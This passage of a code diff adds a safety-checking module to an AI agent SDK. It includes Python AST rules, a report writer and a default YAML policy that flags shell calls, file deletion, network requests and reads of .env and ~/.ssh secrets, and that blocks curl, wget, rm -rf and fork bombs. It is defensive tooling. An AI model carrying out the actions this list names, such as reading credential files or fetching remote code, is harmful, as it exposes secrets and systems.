resolve_call_name(self, node: ast.AST) -> str: + """Resolve a simple dotted call name with import aliases.""" + if isinstance(node, ast.Name): + return self.aliases.get(node.id, node.id) + if isinstance(node, ast.Attribute): + base = self.resolve_call_name(node.value) + return f"{base}.{node.attr}" if base else node.attr + if isinstance(node, ast.Call): + return self.resolve_call_name(node.func) + return "" + + +class PythonAstRule(Rule): + """Base class for AST-backed Python rules.""" + + severity = SafetySeverity.HIGH + + async def check(self, request: ToolExecutionRequest, policy: SafetyPolicy) -> List[Finding]: + source = 
_extract_python_source(request) + if not source: + return [] + context = PythonScanContext.create(source) + if context is None: + return [] + return self.check_ast(context, policy) + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + """Check parsed Python source.""" + raise NotImplementedError + + def _finding(self, message: str, node: ast.AST, policy: SafetyPolicy, target: str = "") -> Finding: + return Finding( + rule_id=self.rule_id, + message=message, + severity=policy.rule_severity(self.rule_id, self.severity), + target=target, + metadata={ + "line": getattr(node, "lineno", 0), + "column": getattr(node, "col_offset", 0), + }, + ) + + +class PythonCallRule(PythonAstRule): + """Rule for matching fully-qualified call names.""" + + call_names: set[str] = set() + message = "Unsafe Python call detected." + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call): + continue + call_name = context.resolve_call_name(node.func) + if call_name in self.call_names and not policy.is_command_allowed(self.rule_id, call_name): + findings.append(self._finding(self.message, node, policy, call_name)) + return findings + + +class OsSystemRule(PythonCallRule): + """Detect os.system calls.""" + + @property + def rule_id(self) -> str: + return "python.os_system" + + call_names = {"os.system"} + message = "Python code calls os.system." + + +class SubprocessRunRule(PythonCallRule): + """Detect subprocess.run calls.""" + + @property + def rule_id(self) -> str: + return "python.subprocess_run" + + call_names = {"subprocess.run"} + message = "Python code calls subprocess.run." 
+ + +class SubprocessPopenRule(PythonCallRule): + """Detect subprocess.Popen calls.""" + + @property + def rule_id(self) -> str: + return "python.subprocess_popen" + + call_names = {"subprocess.Popen"} + message = "Python code calls subprocess.Popen." + + +class ShutilRmtreeRule(PythonCallRule): + """Detect shutil.rmtree calls.""" + + @property + def rule_id(self) -> str: + return "python.shutil_rmtree" + + call_names = {"shutil.rmtree"} + message = "Python code calls shutil.rmtree." + + +class RequestsGetPostRule(PythonCallRule): + """Detect requests.get and requests.post calls.""" + + @property + def rule_id(self) -> str: + return "python.requests_get_post" + + call_names = {"requests.get", "requests.post"} + message = "Python code makes an HTTP request with requests.get/post." + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call): + continue + call_name = context.resolve_call_name(node.func) + if call_name not in self.call_names: + continue + domain = _domain_from_call(node) + if domain and policy.is_domain_allowed(self.rule_id, domain): + continue + findings.append(self._finding(self.message, node, policy, call_name)) + return findings + + +class SocketConnectRule(PythonAstRule): + """Detect socket connect calls.""" + + @property + def rule_id(self) -> str: + return "python.socket_connect" + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call): + continue + call_name = context.resolve_call_name(node.func) + is_direct_socket_call = call_name in {"socket.connect", "socket.socket.connect"} + if not (is_direct_socket_call or self._is_socket_var_connect(node.func, context)): + continue + domain = _domain_from_call(node) + if domain and policy.is_domain_allowed(self.rule_id, domain): + 
continue + findings.append(self._finding("Python code calls socket.connect.", node, policy, call_name or "connect")) + return findings + + @staticmethod + def _is_socket_var_connect(node: ast.AST, context: PythonScanContext) -> bool: + return (isinstance(node, ast.Attribute) and node.attr == "connect" and isinstance(node.value, ast.Name) + and node.value.id in context.socket_vars) + + +class PythonPathReadRule(PythonAstRule): + """Base class for file-read rules that match path literals.""" + + message = "Python code reads a sensitive path." + + def check_ast(self, context: PythonScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for node in ast.walk(context.tree): + if not isinstance(node, ast.Call) or not _is_file_read_call(node, context): + continue + for path in _path_strings_from_read_call(node): + if self.path_matches(path, policy): + findings.append(self._finding(self.message, node, policy, path)) + return findings + + def path_matches(self, path: str, policy: SafetyPolicy) -> bool: + """Return whether a path literal should be reported.""" + raise NotImplementedError + + +class EnvFileReadRule(PythonPathReadRule): + """Detect reads of .env files.""" + + @property + def rule_id(self) -> str: + return "python.read_env_file" + + message = "Python code reads a .env file." + + def path_matches(self, path: str, policy: SafetyPolicy) -> bool: + return policy.is_path_blocked(self.rule_id, path) + + +class SshPathReadRule(PythonPathReadRule): + """Detect reads of ~/.ssh paths.""" + + @property + def rule_id(self) -> str: + return "python.read_ssh_path" + + message = "Python code reads a ~/.ssh path." 
+ + def path_matches(self, path: str, policy: SafetyPolicy) -> bool: + return policy.is_path_blocked(self.rule_id, path) + + +class PythonScanner: + """Convenience scanner using the default Python safety rules.""" + + def __init__(self, rules: Optional[list[Rule]] = None, policy: Optional[SafetyPolicy] = None): + self._checker = SafetyChecker(rules or create_python_rules(), policy) + + async def scan(self, source: str, policy: Optional[SafetyPolicy] = None) -> SafetyResult: + """Scan Python source and return a safety result.""" + request = ToolExecutionRequest(language="python", script=source) + return await self._checker.check(request, policy) + + +def create_python_rules() -> list[Rule]: + """Create the built-in Python AST safety rules.""" + return [ + OsSystemRule(), + SubprocessRunRule(), + SubprocessPopenRule(), + ShutilRmtreeRule(), + EnvFileReadRule(), + SshPathReadRule(), + RequestsGetPostRule(), + SocketConnectRule(), + ] + + +def _extract_python_source(request: ToolExecutionRequest) -> str: + language = (request.language or request.metadata.get("language") or "").strip().lower() + if language and language not in _PYTHON_LANGUAGES: + return "" + for value in ( + request.script, + request.args.get("code"), + request.args.get("script"), + request.metadata.get("code"), + request.metadata.get("script"), + request.metadata.get("python_code"), + ): + if isinstance(value, str) and value.strip(): + return value + return "" + + +def _is_file_read_call(node: ast.Call, context: PythonScanContext) -> bool: + call_name = context.resolve_call_name(node.func) + if call_name in {"open", "builtins.open", "io.open"}: + return _mode_reads(node, default=True) + if call_name.endswith(".open"): + return _mode_reads(node, default=True) + return call_name.endswith(".read_text") or call_name.endswith(".read_bytes") + + +def _mode_reads(node: ast.Call, default: bool) -> bool: + mode = None + if len(node.args) >= 2 and isinstance(node.args[1], ast.Constant) and 
isinstance(node.args[1].value, str): + mode = node.args[1].value + for keyword in node.keywords: + if keyword.arg == "mode" and isinstance(keyword.value, ast.Constant) and isinstance(keyword.value.value, str): + mode = keyword.value.value + break + if mode is None: + return default + return "r" in mode or "+" in mode + + +def _path_strings_from_read_call(node: ast.Call) -> list[str]: + candidates: list[ast.AST] = [] + if _is_path_method_call(node): + value = node.func.value # type: ignore[union-attr] + if isinstance(value, ast.Call): + candidates.extend(value.args) + candidates.extend(keyword.value for keyword in value.keywords if keyword.arg in {"path", "file"}) + else: + candidates.append(value) + else: + if node.args: + candidates.append(node.args[0]) + candidates.extend(keyword.value for keyword in node.keywords if keyword.arg in {"file", "path"}) + strings: list[str] = [] + for candidate in candidates: + strings.extend(_literal_strings(candidate)) + return strings + + +def _is_path_method_call(node: ast.Call) -> bool: + return isinstance(node.func, ast.Attribute) and node.func.attr in {"open", "read_text", "read_bytes"} + + +def _literal_strings(node: ast.AST) -> list[str]: + strings: list[str] = [] + for child in ast.walk(node): + if isinstance(child, ast.Constant) and isinstance(child.value, str): + strings.append(child.value) + return strings + + +def _domain_from_call(node: ast.Call) -> str: + for arg in node.args: + for value in _literal_strings(arg): + domain = _domain_from_string(value) + if domain: + return domain + for keyword in node.keywords: + for value in _literal_strings(keyword.value): + domain = _domain_from_string(value) + if domain: + return domain + return "" + + +def _domain_from_string(value: str) -> str: + value = value.strip() + if not value: + return "" + parsed = urlparse(value) + if parsed.hostname: + return parsed.hostname.lower() + host = value.split("/", 1)[0].split(":", 1)[0].strip() + return host.lower() diff --git 
a/trpc_agent_sdk/tools/safety/report.py b/trpc_agent_sdk/tools/safety/report.py new file mode 100644 index 00000000..18e8e746 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/report.py @@ -0,0 +1,80 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Stable JSON report generation for tool safety checks.""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any + +from .audit import risk_level +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest + +DEFAULT_REPORT_FILE = Path("tool_safety_report.json") + + +class SafetyReportWriter: + """Write the latest tool safety result as a stable JSON report.""" + + def __init__(self, path: str | Path = DEFAULT_REPORT_FILE): + self._path = Path(path) + + @property + def path(self) -> Path: + """Return the report path.""" + return self._path + + def write(self, result: SafetyResult) -> None: + """Write one report file.""" + report = build_report(result) + with self._path.open("w", encoding="utf-8") as fp: + json.dump(report, fp, ensure_ascii=False, indent=2, sort_keys=True) + fp.write("\n") + + +def build_report(result: SafetyResult) -> dict[str, Any]: + """Build a stable, monitor-friendly report object.""" + request = result.request or ToolExecutionRequest() + findings = result.findings or [] + rule_ids = [finding.rule_id for finding in findings] + return { + "schema_version": "v1", + "decision": result.decision.value, + "risk_level": risk_level(findings).value, + "rule_id": ",".join(rule_ids), + "rule_ids": rule_ids, + "evidence": [_evidence(finding) for finding in findings], + "recommendation": _recommendation(result), + "tool_name": request.tool_name, + "agent_name": request.agent_name, + "invocation_id": request.invocation_id, + 
"function_call_id": request.function_call_id, + "language": request.language, + "finding_count": len(findings), + "blocked": result.decision != SafetyDecision.ALLOW, + } + + +def _evidence(finding: Finding) -> dict[str, Any]: + return { + "rule_id": finding.rule_id, + "severity": finding.severity.value, + "message": finding.message, + "target": finding.target, + "metadata": finding.metadata, + } + + +def _recommendation(result: SafetyResult) -> str: + if result.decision == SafetyDecision.DENY: + return "Do not execute this tool call. Review the reported rule findings and modify the script or policy." + if result.decision == SafetyDecision.NEEDS_HUMAN_REVIEW: + return "Require human review before executing this tool call." + return "No blocking safety findings. Continue execution." diff --git a/trpc_agent_sdk/tools/safety/telemetry.py b/trpc_agent_sdk/tools/safety/telemetry.py new file mode 100644 index 00000000..4f8b071a --- /dev/null +++ b/trpc_agent_sdk/tools/safety/telemetry.py @@ -0,0 +1,29 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. 
+"""Optional OpenTelemetry attributes for tool safety checks.""" + +from __future__ import annotations + +from .audit import risk_level +from .models import SafetyResult + + +def record_safety_attributes(result: SafetyResult) -> None: + """Record tool safety attributes on the current OpenTelemetry span when available.""" + try: + from opentelemetry import trace # pylint: disable=import-outside-toplevel + except Exception: # pylint: disable=broad-except + return + + try: + span = trace.get_current_span() + if span is None: + return + span.set_attribute("tool.safety.decision", result.decision.value) + span.set_attribute("tool.safety.risk_level", risk_level(result.findings).value) + span.set_attribute("tool.safety.rule_id", ",".join(finding.rule_id for finding in result.findings)) + except Exception: # pylint: disable=broad-except + return diff --git a/trpc_agent_sdk/tools/safety/tool_safety_policy.yaml b/trpc_agent_sdk/tools/safety/tool_safety_policy.yaml new file mode 100644 index 00000000..003f1e8a --- /dev/null +++ b/trpc_agent_sdk/tools/safety/tool_safety_policy.yaml @@ -0,0 +1,83 @@ +# Default policy for tool script safety checks. 
+enabled: true +default_decision: allow + +deny_severities: + - high + - critical +review_severities: + - medium + +allowed_domains: [] +blocked_paths: + - .env + - ~/.ssh +allowed_commands: [] +max_timeout: 3600 +max_output_size: 1048576 + +severity: + default: high + python.requests_get_post: medium + python.socket_connect: medium + bash.shell_pipe: medium + bash.background_execution: medium + bash.long_sleep: medium + +rule_configs: + python.os_system: + severity: high + allowed_commands: [] + python.subprocess_run: + severity: high + allowed_commands: [] + python.subprocess_popen: + severity: high + allowed_commands: [] + python.shutil_rmtree: + severity: high + allowed_commands: [] + python.read_env_file: + severity: high + blocked_paths: + - .env + python.read_ssh_path: + severity: high + blocked_paths: + - ~/.ssh + python.requests_get_post: + severity: medium + allowed_domains: [] + python.socket_connect: + severity: medium + allowed_domains: [] + bash.rm_rf: + severity: high + allowed_commands: [] + bash.curl: + severity: high + allowed_commands: [] + bash.wget: + severity: high + allowed_commands: [] + bash.sudo: + severity: high + allowed_commands: [] + bash.apt_install: + severity: high + allowed_commands: [] + bash.pip_install: + severity: high + allowed_commands: [] + bash.npm_install: + severity: high + allowed_commands: [] + bash.background_execution: + severity: medium + bash.shell_pipe: + severity: medium + bash.fork_bomb: + severity: critical + bash.long_sleep: + severity: medium + max_timeout: 3600 diff --git a/trpc_agent_sdk/tools/safety/wrapper.py b/trpc_agent_sdk/tools/safety/wrapper.py new file mode 100644 index 00000000..b2e96cfe --- /dev/null +++ b/trpc_agent_sdk/tools/safety/wrapper.py @@ -0,0 +1,48 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. 
+"""Lightweight wrappers for applying safety checks before execution.""" + +from __future__ import annotations + +from typing import Any +from typing import Awaitable +from typing import Callable +from typing import Optional + +from .checker import SafetyChecker +from .models import SafetyDecision +from .models import SafetyResult +from .models import ToolExecutionRequest +from .policy import SafetyPolicy + +ExecutionHandler = Callable[[], Awaitable[Any]] + + +class SafetyViolationError(RuntimeError): + """Raised when a safety result blocks execution.""" + + def __init__(self, result: SafetyResult): + self.result = result + super().__init__(f"tool execution blocked by safety policy: {result.decision.value}") + + +class SafetyExecutionWrapper: + """Apply a checker before invoking an async execution handler.""" + + def __init__(self, checker: Optional[SafetyChecker] = None, policy: Optional[SafetyPolicy] = None): + self._checker = checker or SafetyChecker(policy=policy) + self._policy = policy + + async def check(self, request: ToolExecutionRequest) -> SafetyResult: + """Run the configured checker.""" + return await self._checker.check(request, self._policy) + + async def run(self, request: ToolExecutionRequest, handler: ExecutionHandler) -> Any: + """Check a request and run the handler when allowed.""" + result = await self.check(request) + if result.decision != SafetyDecision.ALLOW: + raise SafetyViolationError(result) + return await handler()
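The check-then-run contract of `SafetyExecutionWrapper.run` in the `wrapper.py` hunk above can be sketched without the SDK installed. This is a minimal illustration, not the SDK's implementation: `Decision`, `Result`, `ViolationError`, `toy_check`, and `guarded_run` are hypothetical stand-ins for `SafetyDecision`, `SafetyResult`, `SafetyViolationError`, the checker, and the wrapper, and the toy checker's single substring rule is an assumption made only for the demo.

```python
from __future__ import annotations

import asyncio
from dataclasses import dataclass
from enum import Enum
from typing import Any, Awaitable, Callable


class Decision(Enum):
    """Hypothetical stand-in for SafetyDecision."""

    ALLOW = "allow"
    DENY = "deny"
    NEEDS_HUMAN_REVIEW = "needs_human_review"


@dataclass
class Result:
    """Hypothetical stand-in for SafetyResult (decision only)."""

    decision: Decision


class ViolationError(RuntimeError):
    """Mirrors SafetyViolationError: keeps the blocking result on the exception."""

    def __init__(self, result: Result):
        self.result = result
        super().__init__(f"tool execution blocked by safety policy: {result.decision.value}")


async def toy_check(script: str) -> Result:
    """Toy checker (assumption): deny any script that mentions os.system."""
    return Result(Decision.DENY if "os.system" in script else Decision.ALLOW)


async def guarded_run(script: str, handler: Callable[[], Awaitable[Any]]) -> Any:
    """Check first; invoke the handler only when the decision is ALLOW."""
    result = await toy_check(script)
    if result.decision != Decision.ALLOW:
        raise ViolationError(result)
    return await handler()


async def demo() -> tuple[str, str]:
    """Run one allowed and one blocked script through the guard."""

    async def handler() -> str:
        return "executed"

    allowed = await guarded_run("print('hi')", handler)
    try:
        await guarded_run("import os; os.system('ls')", handler)
        blocked = "not blocked"
    except ViolationError as exc:
        # The caller can inspect the full result, not just the message.
        blocked = exc.result.decision.value
    return allowed, blocked


if __name__ == "__main__":
    print(asyncio.run(demo()))
```

As in the diff, any decision other than `ALLOW` raises, so a `needs_human_review` result blocks execution in the same way as `deny`. Callers that want a separate approval path would need to catch the exception and branch on `exc.result.decision`.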